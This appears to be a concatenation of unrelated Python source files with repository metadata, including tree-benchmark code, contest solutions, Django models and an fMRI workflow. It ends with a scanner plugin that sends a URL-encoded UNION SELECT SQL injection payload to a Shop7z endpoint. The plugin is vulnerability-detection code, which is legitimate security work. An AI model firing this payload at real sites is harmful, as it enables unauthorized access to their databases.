def contains3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode5(object):
value:int = 0
value2:int = 0
value3:int = 0
value4:int = 0
value5:int = 0
left:"TreeNode5" = None
left2:"TreeNode5" = None
left3:"TreeNode5" = None
left4:"TreeNode5" = None
left5:"TreeNode5" = None
right:"TreeNode5" = None
right2:"TreeNode5" = None
right3:"TreeNode5" = None
right4:"TreeNode5" = None
right5:"TreeNode5" = None
def insert(self:"TreeNode5", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode5", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode5", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode5", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class Tree(object):
root:TreeNode = None
size:int = 0
def insert(self:"Tree", x:int) -> object:
if self.root is None:
self.root = makeNode(x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree2(object):
root:TreeNode2 = None
root2:TreeNode2 = None
size:int = 0
size2:int = 0
def insert(self:"Tree2", x:int) -> object:
if self.root is None:
self.root = makeNode2(x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree2", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode2(x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree2", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree2", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree3(object):
root:TreeNode3 = None
root2:TreeNode3 = None
root3:TreeNode3 = None
size:int = 0
size2:int = 0
size3:int = 0
def insert(self:"Tree3", x:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree3", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree3", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree3", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree3", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree3", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree4(object):
root:TreeNode4 = None
root2:TreeNode4 = None
root3:TreeNode4 = None
root4:TreeNode4 = None
size:int = 0
size2:int = 0
size3:int = 0
size4:int = 0
def insert(self:"Tree4", x:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree4", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree4", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree4", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree4", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree4", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree5(object):
root:TreeNode5 = None
root2:TreeNode5 = None
root3:TreeNode5 = None
root4:TreeNode5 = None
root5:TreeNode5 = None
size:int = 0
size2:int = 0
size3:int = 0
size4:int = 0
size5:int = 0
def insert(self:"Tree5", x:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree5", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree5", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree5", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree5", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree5", x:int, x2:$Type, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def makeNode(x: int) -> TreeNode:
b:TreeNode = None
b = TreeNode()
b.value = x
return b
def makeNode2(x: int, x2: int) -> TreeNode2:
b:TreeNode2 = None
b2:TreeNode2 = None
b = TreeNode2()
b.value = x
return b
def makeNode3(x: int, x2: int, x3: int) -> TreeNode3:
b:TreeNode3 = None
b2:TreeNode3 = None
b3:TreeNode3 = None
b = TreeNode3()
b.value = x
return b
def makeNode4(x: int, x2: int, x3: int, x4: int) -> TreeNode4:
b:TreeNode4 = None
b2:TreeNode4 = None
b3:TreeNode4 = None
b4:TreeNode4 = None
b = TreeNode4()
b.value = x
return b
def makeNode5(x: int, x2: int, x3: int, x4: int, x5: int) -> TreeNode5:
b:TreeNode5 = None
b2:TreeNode5 = None
b3:TreeNode5 = None
b4:TreeNode5 = None
b5:TreeNode5 = None
b = TreeNode5()
b.value = x
return b
# Input parameters
n:int = 100
n2:int = 100
n3:int = 100
n4:int = 100
n5:int = 100
c:int = 4
c2:int = 4
c3:int = 4
c4:int = 4
c5:int = 4
# Data
t:Tree = None
t2:Tree = None
t3:Tree = None
t4:Tree = None
t5:Tree = None
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
k:int = 37813
k2:int = 37813
k3:int = 37813
k4:int = 37813
k5:int = 37813
# Crunch
t = Tree()
while i < n:
t.insert(k)
k = (k * 37813) % 37831
if i % c != 0:
t.insert(i)
i = i + 1
print(t.size)
for i in [4, 8, 15, 16, 23, 42]:
if t.contains(i):
print(i)
| [
"647530+Virtlink@users.noreply.github.com"
] | 647530+Virtlink@users.noreply.github.com |
9f5f60cd24bb4ba0a3ed8fc4a7b797829f8a4512 | 181af10fcf40b824fe92d3b8f72fd15d6d1490c2 | /Biweekly Contests/51-100/biweek 98/2568. Minimum Impossible OR/Minimum Impossible OR.py | 6bbcc085906cb358f19e80cbfef2653c5595026a | [] | no_license | wangyendt/LeetCode | 402c59a0b7b7f5b3a672231ea5dad8056ade36af | 4a3ba15284c45b2d8bf38306c8c8526ae174615c | refs/heads/master | 2023-08-10T06:27:54.995152 | 2023-08-10T02:22:27 | 2023-08-10T02:22:27 | 176,651,399 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 518 | py | """
@author: wangye(Wayne)
@license: Apache Licence
@file: Minimum Impossible OR.py
@time: 20230330
@contact: wang121ye@hotmail.com
@site: wangyendt@github.com
@software: PyCharm
# code is far away from bugs.
"""
from typing import *
class Solution:
def minImpossibleOR(self, nums: List[int]) -> int:
nums_set = set(nums)
for i in range(1000):
if (1 << i) not in nums_set:
return 1 << i
so = Solution()
print(so.minImpossibleOR(nums=[4, 32, 16, 8, 8, 75, 1, 2]))
| [
"905317742@qq.com"
] | 905317742@qq.com |
160bdd13a34885811fabe3e183291048859c9306 | 4296cb5b97a69382d1fe6b73753a2ffcd1d154c5 | /tenkei90/064.py | 05309a40d520930ec7dd6c78e4e01ef920de1155 | [] | no_license | tokuD/atcoder | a199a5fe92be54d0b66ceaf6158116984f52cd01 | a95a0380af129109fcf48eb1d4994bbb52925320 | refs/heads/master | 2023-08-28T10:28:55.763895 | 2021-11-13T15:49:38 | 2021-11-13T15:49:38 | 371,675,666 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 635 | py | def main():
N,Q = map(int,input().split())
A = list(map(int,input().split()))
LRV = [list(map(int,input().split())) for i in range(Q)]
dif = []
ans = 0
for i in range(N-1):
dif.append(A[i+1]-A[i])
for i in range(N-1):
ans += abs(dif[i])
for i in range(Q):
L,R,V = map(lambda x: x-1,LRV[i])
V += 1
if L > 0:
ans -= abs(dif[L-1])
dif[L-1] += V
ans += abs(dif[L-1])
if R < N-1:
ans -= abs(dif[R])
dif[R] -= V
ans += abs(dif[R])
print(ans)
if __name__ == '__main__':
main()
| [
"megumu112851@gmail.com"
] | megumu112851@gmail.com |
5b09999136264f3b86f6cc291e202df18999fb3c | 5fd59608e3b0ea2a92ac19f9104f7a9a7c10bd03 | /apps/components/floors/models.py | 1d6656253db58a9a35934385d3f2eefc22f5ecc2 | [] | no_license | tmac408/makahiki | 47251470e1db3ee2fa6a7fdfd5ac83153dd7945a | c489bc6870a755bcb4c830be9c112047afde9fbe | refs/heads/master | 2021-01-10T20:35:27.096381 | 2011-07-05T04:27:54 | 2011-07-05T04:27:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,973 | py | import datetime
from django.db import models
from django.contrib.auth.models import User
from django.template.defaultfilters import slugify
from django.db.models import Sum, Max, Q
from components.makahiki_base import get_floor_label, get_current_round
# Create your models here.
class Dorm(models.Model):
# Automatically populate slug field when the name is added.
prepopulated_fields = {"slug": ("name",)}
name = models.CharField(max_length=200, help_text="The name of the dorm.")
slug = models.SlugField(max_length=20, help_text="Automatically generated if left blank.")
created_at = models.DateTimeField(editable=False);
updated_at = models.DateTimeField(null=True, editable=False)
def __unicode__(self):
return self.name
def floor_points_leaders(self, num_results=10, round_name=None):
"""
Returns the top points leaders for the given dorm.
"""
if round_name:
return self.floor_set.filter(
profile__scoreboardentry__round_name=round_name
).annotate(
points=Sum("profile__scoreboardentry__points"),
last=Max("profile__scoreboardentry__last_awarded_submission")
).order_by("-points", "-last")[:num_results]
return self.floor_set.annotate(
points=Sum("profile__points"),
last=Max("profile__last_awarded_submission")
).order_by("-points", "-last")[:num_results]
def save(self, *args, **kwargs):
"""Custom save method to generate slug and set created_at/updated_at."""
if not self.slug:
self.slug = slugify(self.name)
if not self.created_at:
self.created_at = datetime.date.today()
else:
self.updated_at = datetime.date.today()
super(Dorm, self).save()
class Floor(models.Model):
prepopulated_fields = {"slug": ("number",)}
number = models.CharField(help_text="The floor number in the dorm. Can be a string value", max_length=10)
slug = models.SlugField(max_length=10, help_text="Automatically generated if left blank.")
dorm = models.ForeignKey(Dorm, help_text="The dorm this floor belongs to.")
floor_identifier = models.CharField(
max_length=200,
blank=True,
null=True,
help_text="Name of the source used in WattDepot to refer to this floor."
)
def __unicode__(self):
return "%s: %s %s" % (self.dorm.name, get_floor_label(), self.number)
@staticmethod
def floor_points_leaders(num_results=10, round_name=None):
"""
Returns the floor points leaders across all dorms.
"""
if round_name:
return Floor.objects.filter(
profile__scoreboardentry__round_name=round_name
).annotate(
points=Sum("profile__scoreboardentry__points"),
last=Max("profile__scoreboardentry__last_awarded_submission")
).order_by("-points", "-last")[:num_results]
return Floor.objects.annotate(
points=Sum("profile__points"),
last=Max("profile__last_awarded_submission")
).order_by("-points", "-last")[:num_results]
def points_leaders(self, num_results=10, round_name=None):
"""
Gets the individual points leaders for the floor.
"""
if round_name:
return self.profile_set.filter(
scoreboardentry__round_name=round_name
).order_by("-scoreboardentry__points", "-scoreboardentry__last_awarded_submission")[:num_results]
return self.profile_set.all().order_by("-points", "-last_awarded_submission")[:num_results]
def current_round_rank(self):
current_round = get_current_round()
if current_round:
return self.rank(round_name=current_round)
return None
def rank(self, round_name=None):
"""Returns the rank of the floor across all dorms."""
if round_name:
from components.makahiki_profiles.models import ScoreboardEntry
aggregate = ScoreboardEntry.objects.filter(
profile__floor=self,
round_name=round_name
).aggregate(points=Sum("points"), last=Max("last_awarded_submission"))
points = aggregate["points"] or 0
last_awarded_submission = aggregate["last"]
# Group by floors, filter out other rounds, and annotate.
annotated_floors = ScoreboardEntry.objects.values("profile__floor").filter(
round_name=round_name
).annotate(
floor_points=Sum("points"),
last_awarded=Max("last_awarded_submission")
)
else:
aggregate = self.profile_set.aggregate(points=Sum("points"), last=Max("last_awarded_submission"))
points = aggregate["points"] or 0
last_awarded_submission = aggregate["last"]
annotated_floors = Floor.objects.annotate(
floor_points=Sum("profile__points"),
last_awarded_submission=Max("profile__last_awarded_submission")
)
count = annotated_floors.filter(floor_points__gt=points).count()
# If there was a submission, tack that on to the count.
if last_awarded_submission:
count = count + annotated_floors.filter(
floor_points=points,
last_awarded_submission__gt=last_awarded_submission
).count()
return count + 1
def current_round_points(self):
"""Returns the number of points for the current round."""
current_round = get_current_round()
if current_round:
return self.points(round_name=current_round)
return None
def points(self, round_name=None):
"""Returns the total number of points for the floor. Takes an optional parameter for a round."""
if round_name:
from components.makahiki_profiles.models import ScoreboardEntry
dictionary = ScoreboardEntry.objects.filter(profile__floor=self, round_name=round_name).aggregate(Sum("points"))
else:
dictionary = self.profile_set.aggregate(Sum("points"))
return dictionary["points__sum"] or 0
def save(self):
"""Custom save method to generate slug and set created_at/updated_at."""
if not self.slug:
self.slug = slugify(self.number)
super(Floor, self).save()
class Post(models.Model):
"""Represents a wall post on a user's wall."""
user = models.ForeignKey(User)
floor = models.ForeignKey(Floor)
text = models.TextField()
style_class = models.CharField(max_length=50, default="user_post") #CSS class to apply to this post.
created_at = models.DateTimeField(editable=False)
def date_string(self):
"""Formats the created date into a pretty string."""
return self.created_at.strftime("%m/%d %I:%M %p")
def save(self):
if not self.created_at:
self.created_at = datetime.datetime.today()
super(Post, self).save()
class PostComment(models.Model):
user = models.ForeignKey(User)
post = models.ForeignKey(Post)
text = models.TextField()
created_at = models.DateTimeField(editable=False)
def save(self):
if not self.created_at:
self.created_at = datetime.date.today()
super(PostComment, self).save() | [
"keoki.lee@gmail.com"
] | keoki.lee@gmail.com |
19047e76956f8fedb8ea5ec36d0d5e187ac40374 | 21aa8c66a53e425b7ab3169c481a472d090ecdc0 | /xcp_abcd/workflow/postprocessing.py | 1ec3523d21f86d5d810b95391862ccf877a48b69 | [
"MIT"
] | permissive | a3sha2/xcp_abcd | 0d1d0a34ce6497f3d3c7fb56f5d0268a9e35748d | 76e8fce12bf445c11a89d1b9de2efdcfa2174dc5 | refs/heads/main | 2023-04-23T20:35:47.949940 | 2021-05-18T12:39:19 | 2021-05-18T12:39:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,283 | py | # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""
post processing the bold/cifti
^^^^^^^^^^^^^^^^^^^^^^^^
.. autofunction:: init_post_process_wf
"""
import numpy as np
from nipype.pipeline import engine as pe
from templateflow.api import get as get_template
from ..interfaces import (ConfoundMatrix,FilteringData,regress)
from ..interfaces import (interpolate,removeTR,censorscrub)
from nipype.interfaces import utility as niu
from nipype.interfaces.workbench import CiftiSmooth
from nipype.interfaces.fsl import Smooth
import sklearn
from niworkflows.engine.workflows import LiterateWorkflow as Workflow
def init_post_process_wf(
mem_gb,
TR,
head_radius,
lower_bpf,
upper_bpf,
bpf_order,
smoothing,
bold_file,
params,
motion_filter_type,
band_stop_max,
band_stop_min,
motion_filter_order,
contigvol,
cifti=False,
dummytime=0,
fd_thresh=0,
name="post_process_wf",
):
"""
This workflow is organizing workflows including
selectign confound matrix, regression and filtering
Workflow Graph
.. workflow::
:graph2use: orig
:simple_form: yes
from xcp_abcd.workflows import init_post_process_wf
wf = init_init_post_process_wf_wf(
mem_gb,
TR,
head_radius,
lower_bpf,
upper_bpf,
bpf_order,
smoothing,
bold_file,
params,
motion_filter_type,
band_stop_max,
band_stop_min,
motion_filter_order,
contigvol,
cifti=False,
dummytime,
fd_thresh,
name="post_process_wf",
)
Parameters
----------
TR: float
Repetition time in second
bold_file: str
bold file for post processing
lower_bpf : float
Lower band pass filter
upper_bpf : float
Upper band pass filter
layout : BIDSLayout object
BIDS dataset layout
contigvol: int
number of contigious volumes
despike: bool
afni depsike
motion_filter_order: int
respiratory motion filter order
motion_filter_type: str
respiratory motion filter type: lp or notch
band_stop_min: float
respiratory minimum frequency in breathe per minutes(bpm)
band_stop_max,: float
respiratory maximum frequency in breathe per minutes(bpm)
layout : BIDSLayout object
BIDS dataset layout
omp_nthreads : int
Maximum number of threads an individual process may use
output_dir : str
Directory in which to save xcp_abcd output
fd_thresh
Criterion for flagging framewise displacement outliers
head_radius : float
radius of the head for FD computation
params: str
nuissance regressors to be selected from fmriprep regressors
smoothing: float
smooth the derivatives output with kernel size (fwhm)
custom_conf: str
path to cusrtom nuissance regressors
dummytime: float
the first vols in seconds to be removed before postprocessing
Inputs
------
bold
bold or cifti file
bold_mask
bold mask if bold is nifti
custom_conf
custom regressors
Outputs
-------
processed_bold
processed or cleaned bold
smoothed_bold
smoothed processed bold
tmask
temporal mask
"""
workflow = Workflow(name=name)
workflow.__desc__ = """ \
"""
if dummytime > 0:
nvolx = str(np.floor(dummytime / TR))
workflow.__desc__ = workflow.__desc__ + """ \
Before nuissance regression and filtering of the data, the first {nvol} were discarded,
.Furthermore, any volumes with framewise-displacement greater than
{fd_thresh} [@satterthwaite2;@power_fd_dvars;@satterthwaite_2013] were flagged as outliers
and excluded from nuissance regression.
""".format(nvol=nvolx,fd_thresh=fd_thresh)
else:
workflow.__desc__ = workflow.__desc__ + """ \
Before nuissance regression and filtering any volumes with framewise-displacement greater than
{fd_thresh} [@satterthwaite2;@power_fd_dvars;@satterthwaite_2013] were flagged as outlier
and excluded from further analyses.
""".format(fd_thresh=fd_thresh)
workflow.__desc__ = workflow.__desc__ + """ \
The following nuissance regressors {regressors} [@mitigating_2018;@benchmarkp;@satterthwaite_2013] were selected
from nuissance confound matrices of fMRIPrep output. These nuissance regressors were regressed out
from the bold data with *LinearRegression* as implemented in Scikit-Learn {sclver} [@scikit-learn].
The residual were then band pass filtered within the frequency band {highpass}-{lowpass} Hz.
""".format(regressors=stringforparams(params=params),sclver=sklearn.__version__,
lowpass=upper_bpf,highpass=lower_bpf)
inputnode = pe.Node(niu.IdentityInterface(
fields=['bold','bold_file','bold_mask','custom_conf']), name='inputnode')
outputnode = pe.Node(niu.IdentityInterface(
fields=['processed_bold', 'smoothed_bold','tmask','fd']), name='outputnode')
inputnode.inputs.bold_file = bold_file
confoundmat = pe.Node(ConfoundMatrix(head_radius=head_radius, params=params,
filtertype=motion_filter_type,cutoff=band_stop_max,
low_freq=band_stop_max,high_freq=band_stop_min,TR=TR,
filterorder=motion_filter_order),
name="ConfoundMatrix", mem_gb=mem_gb)
filterdx = pe.Node(FilteringData(tr=TR,lowpass=upper_bpf,highpass=lower_bpf,
filter_order=bpf_order),
name="filter_the_data", mem_gb=mem_gb)
regressy = pe.Node(regress(tr=TR),
name="regress_the_data",mem_gb=mem_gb)
censor_scrubwf = pe.Node(censorscrub(fd_thresh=fd_thresh,TR=TR,
head_radius=head_radius,contig=contigvol,
time_todrop=dummytime),
name="censor_scrub",mem_gb=mem_gb)
interpolatewf = pe.Node(interpolate(TR=TR),
name="interpolation",mem_gb=mem_gb)
if dummytime > 0:
rm_dummytime = pe.Node(removeTR(time_todrop=dummytime,TR=TR),
name="remove_dummy_time",mem_gb=mem_gb)
# get the confpund matrix
workflow.connect([
# connect bold confound matrix to extract confound matrix
(inputnode, confoundmat, [('bold_file', 'in_file'),]),
])
if dummytime > 0:
workflow.connect([
(confoundmat,rm_dummytime,[('confound_file','fmriprep_conf'),]),
(inputnode,rm_dummytime,[('bold','bold_file'),
('bold_mask','mask_file'),])
])
if inputnode.inputs.custom_conf:
workflow.connect([ (inputnode,rm_dummytime,[('custom_conf','custom_conf')]),
(rm_dummytime,censor_scrubwf,[('custom_confdropTR','custom_conf')]),
(censor_scrubwf,regressy,[('customconf_censored','custom_conf')]),])
workflow.connect([
(rm_dummytime,censor_scrubwf,[('bold_file_TR','in_file'),
('fmrip_confdropTR','fmriprep_conf'),]),
(inputnode,censor_scrubwf,[('bold_file','bold_file'),
('bold_mask','mask_file')]),
(censor_scrubwf,regressy,[('bold_censored','in_file'),
('fmriprepconf_censored','confounds')]),
(inputnode,regressy,[('bold_mask','mask')]),
(inputnode, filterdx,[('bold_mask','mask')]),
(inputnode, interpolatewf,[('bold_mask','mask_file')]),
(regressy,interpolatewf,[('res_file','in_file'),]),
(censor_scrubwf,interpolatewf,[('tmask','tmask'),]),
(censor_scrubwf,outputnode,[('tmask','tmask')]),
(inputnode,interpolatewf,[('bold_file','bold_file')]),
(interpolatewf,filterdx,[('bold_interpolated','in_file')]),
(filterdx,outputnode,[('filt_file','processed_bold')]),
(censor_scrubwf,outputnode,[('fd_timeseries','fd')])
])
else:
if inputnode.inputs.custom_conf:
workflow.connect([
(inputnode,censor_scrubwf,[('custom_conf','custom_conf')]),
(censor_scrubwf,regressy,[('customconf_censored','custom_conf')]) ])
workflow.connect([
(inputnode,censor_scrubwf,[('bold','in_file'),
('bold_file','bold_file'),
('bold_mask','mask_file'),]),
(confoundmat,censor_scrubwf,[('confound_file','fmriprep_conf')]),
(censor_scrubwf,regressy,[('bold_censored','in_file'),
('fmriprepconf_censored','confounds'),]),
(inputnode,regressy,[('bold_mask','mask')]),
(inputnode, interpolatewf,[('bold_mask','mask_file')]),
(regressy,interpolatewf,[('res_file','in_file'),]),
(censor_scrubwf,interpolatewf,[('tmask','tmask'),]),
(censor_scrubwf,outputnode,[('tmask','tmask')]),
(inputnode,interpolatewf,[('bold_file','bold_file')]),
(interpolatewf,filterdx,[('bold_interpolated','in_file')]),
(filterdx,outputnode,[('filt_file','processed_bold')]),
(inputnode, filterdx,[('bold_mask','mask')]),
(censor_scrubwf,outputnode,[('fd_timeseries','fd')])
])
if smoothing:
sigma_lx = fwhm2sigma(smoothing)
if cifti:
workflow.__desc__ = workflow.__desc__ + """ \
The processed bold was smoothed with the workbench with kernel size (FWHM) of {kernelsize} mm .
""" .format(kernelsize=str(smoothing))
smooth_data = pe.Node(CiftiSmooth(sigma_surf = sigma_lx, sigma_vol=sigma_lx, direction ='COLUMN',
right_surf=str(get_template("fsLR", hemi='R',suffix='sphere',density='32k')[0]),
left_surf=str(get_template("fsLR", hemi='L',suffix='sphere',density='32k')[0])),
name="cifti_smoothing", mem_gb=mem_gb)
workflow.connect([
(filterdx, smooth_data,[('filt_file','in_file')]),
(smooth_data, outputnode,[('out_file','smoothed_bold')])
])
else:
workflow.__desc__ = workflow.__desc__ + """ \
The processed bold was smoothed with FSL and kernel size (FWHM) of {kernelsize} mm.
""" .format(kernelsize=str(smoothing))
smooth_data = pe.Node(Smooth(output_type = 'NIFTI_GZ',fwhm = smoothing),
name="nifti_smoothing", mem_gb=mem_gb )
workflow.connect([
(filterdx, smooth_data,[('filt_file','in_file')]),
(smooth_data, outputnode,[('smoothed_file','smoothed_bold')])
])
## smoothing the datt if requested
return workflow
def fwhm2sigma(fwhm):
return fwhm / np.sqrt(8 * np.log(2))
def stringforparams(params):
if params == '24P':
bsignal = "including six motion parameters with their temporal derivatives, \
quadratic expansion of both six motion paramters and their derivatives \
to make a total of 24 nuissance regressors "
if params == '27P':
bsignal = "including six motion parameters with their temporal derivatives, \
quadratic expansion of both six motion paramters and their derivatives, global signal, \
white and CSF signal to make a total 27 nuissance regressors"
if params == '36P':
bsignal= "including six motion parameters, white ,CSF and global signals, with their temporal derivatives, \
quadratic expansion of these nuissance regressors and their derivatives \
to make a total 36 nuissance regressors"
return bsignal
| [
"azeez.adebimpe@outlook.com"
] | azeez.adebimpe@outlook.com |
45e77e2a9c803a25003af8d423e528ff7874eea9 | bd9a09a3f1a8b2b5166c540ada93cc5b30591605 | /scanner/plugins/cms/shop7z/shop7z_order_checknoprint_sqli.py | 85f9412e216939cff4178425a6cdb8666ba5093a | [
"MIT"
] | permissive | iceyhexman/onlinetools | 3cb6e349fc30c515f96429abeab5fbcc430ac0cc | 61f2df7ff8e6ad97ca7901728c3ab749679a2bd0 | refs/heads/master | 2023-08-06T19:31:51.328657 | 2022-10-28T04:01:38 | 2022-10-28T04:01:38 | 119,565,769 | 1,662 | 358 | MIT | 2023-03-31T14:34:13 | 2018-01-30T16:51:46 | Python | UTF-8 | Python | false | false | 1,414 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: shop7z order_checknoprint.asp SQL注入
referer: http://www.wooyun.org/bugs/wooyun-2010-068345
author: Lucifer
description: 文件order_checknoprint.asp中,参数id存在SQL注入。
'''
import sys
import requests
class shop7z_order_checknoprint_sqli_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/order_checknoprint.asp?checkno=1&id=1%20UNION%20SELECT%201%2C2%2CCHR%2832%29%2bCHR%2835%29%2bCHR%28116%29%2bCHR%28121%29%2bCHR%28113%29%2bCHR%2835%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C38%2C39%2C40%2C41%2C42%20from%20MSysAccessObjects"
vulnurl = self.url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
if r"#tyq#" in req.text:
return "[+]存在shop7z order_checknoprint.asp SQL注入漏洞...(高危)\tpayload: "+vulnurl
except:
return "[-]connect timeout"
if __name__ == "__main__":
testVuln = shop7z_order_checknoprint_sqli_BaseVerify(sys.argv[1])
testVuln.run() | [
"834430486@qq.com"
] | 834430486@qq.com |
